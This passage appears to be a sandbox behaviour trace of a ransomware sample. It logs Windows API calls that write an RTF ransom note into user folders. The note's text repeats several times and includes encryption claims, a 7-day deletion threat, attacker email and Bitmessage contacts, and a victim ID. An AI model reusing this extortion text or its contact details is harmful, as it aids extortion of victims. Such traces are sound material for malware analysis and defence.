agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0284.845] WriteFile (in: hFile=0x2ec, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0284.846] CloseHandle (hObject=0x2ec) returned 1 [0284.846] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\#readme_eman#.rtf")) returned 0xffffffff [0284.846] GetLastError () returned 0x2 [0284.846] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\et\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0284.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.847] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 